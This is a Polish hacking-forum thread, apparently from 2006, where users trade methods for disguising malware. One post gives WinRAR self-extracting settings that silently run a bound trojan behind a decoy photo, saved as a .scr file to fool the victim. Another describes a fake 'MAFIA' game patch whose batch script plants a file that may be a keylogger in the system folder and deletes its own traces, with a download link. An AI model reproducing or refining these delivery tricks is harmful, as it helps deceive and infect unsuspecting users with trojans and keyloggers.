Samowypakowujące się archiwum.

cichociemny

Użytkownik
Dołączył
Marzec 27, 2006
Posty
1
JOŁ SQUAD to moj pierwszy post tutaj
Kiedyś ściągnolem se ten FFF i zbinderowalem (zbindowałem?) se tam 2 plik<, ok dzialal tylko niestety AV go wykrywa wiec chcialem znaleść inny sposób wiec zaznaczylem 2 pliki jeden to byl *.exe a drogi ("drugi" się pisze przez "u") to *.jpg i spakowalem je archiwicznie rarem przez sfx [tam w tym panelu sie zaznacza] i dalem komentarze:

Silent=1
Overwrite=1
Setup=*.exe
Setup=*.jpg

plik zapisalem jako twoja_nazwa.scr dla zmyly ofiary.po otworzeniu otiera sie fotka a w tle owiera sie nasz Trojan
<
k: Tylko mam jeden PROBLEM natomiast nieumiem (partykułę "nie" z czasownikami piszemy oddzielnie) zmienic ikonki tego scr i czy ktoś mi pomoze ;]
 

ra-v

Użytkownik
Dołączył
Sierpień 9, 2006
Posty
36
Originally posted by cichociemny
nieumiem (partykułę "nie" z czasownikami piszemy oddzielnie) zmienic ikonki tego scr

Jest wiele programow do zmieniania ikon, np Change Ico itp. . Trzeba szukac... :nauka:

PS Ktos, gdzies w jakims poscie podal link do programu Change Ico oraz link do 700-iles ikon...
 

jackal_21

Użytkownik
Dołączył
Sierpień 11, 2006
Posty
220
Witam
Niedawno zrobiłem program (o ile mozna g tak nazwać) (narazie tylko taki umiem) który:
- jest niby patch'em do gry "MAFIA"
- pliki są pobrane z innych programów gier i lekko zodyfikowane przeze mnie
- znajduje sie tam plik (obojetnie jaki ma słuzyć do przesłania go na komputer uzywającego program) nazwałem go virus.htl (rozszeżenie wymyślone) (moze to być virus keyloger itp.)
- i jest jeszcze plik wsadowy patch.bat
Wszystko jest spakowane SFX z lokalizacją na c: i z uruchomieniem pliku wsadowego patch.bat po rozpakowaniu. Plik ma za zadanie skopiować plik virus.htl w moim przypadku na c: (żeby było trudniej go znaleźć mozna dopisać c:windowssystem32 ) a nastepnie usunąć ten plik virus.htl i patch.bat z folderu rozpakowanego, także nie ma śladu po pliku wsadowym i po virus.
Podaję link do pliku spakowanego:
http://www.jackal.dzis.net/PATCH.EXE

Ps. Jest to program dla mało znających się na komputerze ale od czegoś musze zacząć
smile.gif


Ocencie go i napiszcie co mógłbym zmienić by był on lepszym rogramem.

I czy mozna zrobić żeby zamiast pliku wsadowego .bat był plik .exe i miał takie same funkcje co plik wsadowy albo zrobić tak by po rozpakowaniu pliku sfx uruchomić jakąś czyność kopiowania/usuwania z innych plików niż exe bat com itp. ??
Pozdrawiam
 
Do góry Bottom